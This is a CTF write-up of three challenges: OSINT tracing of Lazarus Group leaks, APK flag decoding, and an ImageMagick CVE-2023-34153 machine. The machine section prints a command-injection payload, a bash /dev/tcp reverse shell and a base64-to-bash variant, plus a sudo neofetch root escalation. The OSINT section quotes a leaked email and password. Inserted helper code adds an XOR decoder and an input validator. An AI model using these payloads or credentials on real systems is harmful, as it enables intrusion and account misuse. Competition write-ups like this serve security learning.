Arab Regional Cybersecurity CTF 2023 Challenges - OSINT, Mobile, Machines Writeup
+--------------------+----------+--------+
| Challenge          | Category | Points |
+--------------------+----------+--------+
| Mission Impossible | OSINT    | 200    |
| Act                | Mobile   | 50     |
| GIF Mak3R          | Machine  | 50     |
+--------------------+----------+--------+
Let's start with the first challenge, Mission Impossible.
Points: 200
Description:
In June 2013,
cybercriminals began launching DDoS attacks against government websites.
Recently, they resurfaced under a new name, Operation Troy.
The APT group accidentally released a significant and sensitive document about themselves.
We attempted to search for it online,
but it seems the website where they uploaded it isn't searchable.
We require your assistance in locating this document so that we can access the information we need.
From the description we learn that the cybercriminals' new name is “Operation Troy” and that they launched DDoS attacks in 2013.
Now let's Google it.
We find the following Wikipedia article:
Now we know that the cybercriminals are the “Lazarus Group” and that their old name is “DarkSeoul”.
The description also says that a document about the APT group (Lazarus Group) was accidentally released:
“The APT group accidentally released a significant and sensitive document about themselves.”
At this point a hint was released for Mission Impossible:
“If you got the document from the largest collection of malware source code, samples, and papers site on the internet, use it wisely.”
OK, let's find the largest collection of malware source code on the internet.
After searching, I found the following GitHub repository: vxunderground.
The GitHub repository has a collection of malware source code, samples, and papers, exactly as in the hint.
Yes, I am on the right track.
They have a large database of malware with documentation and source code.
Let's search for entries from 2013.
After opening Operation Troy, we find the samples together with the documentation.
Now we need the Operation Troy documentation.
The documentation is 29 pages long and contains a lot of information.
After a long search through the documentation, I found a section called Analysis containing “calling card a day after the attacks in the form of a web pop-up message”,
and there is an email address and password:
“joseph.r.ulatoski@gmail.com::lqaz@WSX3edc$RFV”
for pastebin.com and www.dropbox.com. These credentials did not work on either site,
so let's do username enumeration with the Sherlock OSINT tool.
username: “joseph.r.ulatoski”
python3 sherlock.py joseph.r.ulatoski
The username “joseph.r.ulatoski” has many social accounts.
Let's check them one by one in the browser.
The first Bitcoin forum link was very interesting because of its creation date.
Under “show posts” we find a post containing a Pastebin link.
I found that the Pastebin paste needs a password, so I tried the password found with the email, “lqaz@WSX3edc$RFV”, but it did not work, so
I remembered that I had found an encryption password in the documentation on page 28: “dkwero38oerA^t@#”.
That password didn't work either,
so I went back to the PDF to look at the password again
and found that it needs a “.” at the end, so
the correct password is “dkwero38oerA^t@#.”
After hard work, we got the flag:
Flag{FR13ND5_R41lY1NG_3VERY0N3_EMBR4C1N9_P34CE_4DV0C473_L0U61Y_3XPRE551N9_S01iDAR17Y
****************************************************************************
The second challenge: Act
Mobile: 50 points
Description:
I started with static analysis of the ‘act.apk’ file using strings:
strings act.apk
I found names of files with the extensions .xml and .png,
so I tried to extract these files using the binwalk and foremost tools:
binwalk -e act.apk
Now we need to know the APK file structure.
From the description, I saw that it asked for JavaScript code,
so let's look at assets.
index.android.bundle is the JavaScript bundle file.
Let's use strings and grep for common words to get the flag:
strings * | grep -i flag
Yes, that is the JavaScript code; the “index.android.bundle” file contains interesting flags,
so let's copy the JS code and open it in an online JavaScript beautifier.
I found the following:
‘flag{N0t_Th4t_E4sy}’)(“616b66607c37333662363f3036613f3765643f3f663366306161643335613632653e653f667a”)
I tried “flag{N0t_Th4t_E4sy}” as the flag, but it was wrong,
so let's use CyberChef on the hex string next to the decoy flag:
“616b66607c37333662363f3036613f3765643f3f663366306161643335613632653e653f667a” + Magic + intensive mode
Finally we get the flag “flag{041e1871f80bc88a4a7ffc42f15b9b8a}”.
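What CyberChef's Magic did here is a single-byte XOR. The following added example (mine, not part of the original writeup) recovers the key from the known prefix “flag{” and decodes the hex string from the bundle; the function names are my own.

```python
# Added example: recover the single-byte XOR key behind the hex string next to the
# decoy flag in index.android.bundle, using "flag{" as known plaintext, then decode.
from typing import Optional

# Hex string copied from the writeup (sits right after 'flag{N0t_Th4t_E4sy}' in the bundle)
CIPHERTEXT_HEX = "616b66607c37333662363f3036613f3765643f3f663366306161643335613632653e653f667a"
KNOWN_PREFIX = b"flag{"


def recover_xor_key(ciphertext: bytes, known_prefix: bytes) -> Optional[int]:
    """Return the key k with ciphertext[i] ^ k == known_prefix[i] for every i of the
    prefix, or None if no single byte explains the whole prefix (i.e. not single-byte XOR)."""
    candidates = {c ^ p for c, p in zip(ciphertext, known_prefix)}
    return candidates.pop() if len(candidates) == 1 else None


def xor_decode(ciphertext: bytes, key: int) -> bytes:
    """Apply the recovered single-byte key to the whole ciphertext."""
    return bytes(b ^ key for b in ciphertext)


def decode_flag(hex_string: str = CIPHERTEXT_HEX) -> str:
    """Full pipeline: hex -> bytes, key recovery, decode, sanity-check the closing brace."""
    ct = bytes.fromhex(hex_string)
    key = recover_xor_key(ct, KNOWN_PREFIX)
    if key is None:
        raise ValueError("no single-byte XOR key maps the prefix to 'flag{'")
    plaintext = xor_decode(ct, key)
    if not plaintext.endswith(b"}"):
        raise ValueError("decoded text does not end with '}': wrong key or not plain XOR")
    return plaintext.decode("ascii")


if __name__ == "__main__":
    key = recover_xor_key(bytes.fromhex(CIPHERTEXT_HEX), KNOWN_PREFIX)
    print(f"key=0x{key:02x} flag={decode_flag()}")  # key=0x07
```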
****************************************************************************
The third challenge: GIF Mak3R
Machine: 50 points
The challenge was about CVE-2023-34153.
The vulnerability is in ImageMagick version 7.1.0-1,
in the “pixel-format” option. When we upload a file to convert,
the following command runs on the back-end server:
magick convert -define video:pixel-format='rgba"`cat test.txt > /tmp/leak3.txt`"' smile.gif smile.mov
which converts the uploaded GIF file to a .mov file,
so we can add our reverse shell code in the following format:
rgba"`cat test.txt > /tmp/leak3.txt`
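From the defender's side, the fix for this bug is to update ImageMagick, but an upload handler should also never pass a free-form pixel-format value through. The following added example (mine, not from the writeup or from ImageMagick; the function names and the allowlist are assumptions) validates the value against an allowlist and flags the injection string quoted above for detection.

```python
# Added example: allowlist the user-supplied value before it reaches
# "magick -define video:pixel-format=...", and flag suspicious values in logs.
import re

# Pixel-format names this hypothetical upload handler accepts (assumed allowlist).
ALLOWED_PIXEL_FORMATS = {"rgba", "rgb24", "yuv420p", "yuva420p", "gray"}
# Legitimate names are short lowercase alphanumerics; anything else is rejected outright.
PIXEL_FORMAT_RE = re.compile(r"[a-z0-9_]{1,32}")
# Characters that have no business in a pixel-format name but drive the injection.
SHELL_META_RE = re.compile(r"""[`"'$;|&<>()\s\\]""")


def is_safe_pixel_format(value: str) -> bool:
    """True only for a well-formed, allowlisted pixel-format name."""
    return bool(PIXEL_FORMAT_RE.fullmatch(value)) and value in ALLOWED_PIXEL_FORMATS


def looks_like_injection(value: str) -> bool:
    """Detection helper for request logs: does the value carry shell metacharacters?"""
    return bool(SHELL_META_RE.search(value))


def build_convert_argv(src: str, dst: str, pixel_format: str) -> list:
    """Build argv for the conversion, refusing any value that fails the allowlist.
    Passing argv without a shell is not enough on its own here: the vulnerable
    ImageMagick builds the ffmpeg delegate command line itself, so the value must
    be validated (or ImageMagick patched) before it is handed over."""
    if not is_safe_pixel_format(pixel_format):
        raise ValueError(f"rejected pixel-format value: {pixel_format!r}")
    return ["magick", "convert", "-define", f"video:pixel-format={pixel_format}", src, dst]


if __name__ == "__main__":
    # Constructed samples: a benign value and the injection string from the writeup.
    for sample in ("rgba", 'rgba"`cat test.txt > /tmp/leak3.txt`"'):
        print(f"{sample!r}: safe={is_safe_pixel_format(sample)} "
              f"suspicious={looks_like_injection(sample)}")
```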
From the website's error messages during testing I saw “/tmp/file”, so I assumed it was a Linux server.
I made the following bash reverse shell:
bash -i >& /dev/tcp/255.255.255.255/5555 0>&1
but I used base64 encoding to avoid quoting errors:
rgba"`echo ImJhc2ggLWkgPiYgL2Rldi90Y3AvMTY1LjIzMi4xODAuNzkvNTU1NSAwPiYxIg== | base64 -d | bash`"
Then I started a listener on my VPS:
nc -nlvp <port>
Then I ran the conversion on the website and got a reverse shell on my VPS.
Unfortunately, I forgot to take screenshots from my VPS while the challenge was running.
Then we need privilege escalation.
It was very easy: “sudo -l”.
I found that any user can run neofetch as root with sudo.
Using GTFOBins: https://gtfobins.github.io/gtfobins/neofetch/
Using the commands from that page, I got a root shell.
The flag was at “/root/flag.txt”.
Thanks for your time and effort to read this. I hope you liked and enjoyed reading it.
You can find the web and forensics writeups, written by my teammates, at the following links:
If you have any comments, edits, or another way to solve them, don’t hesitate to contact me: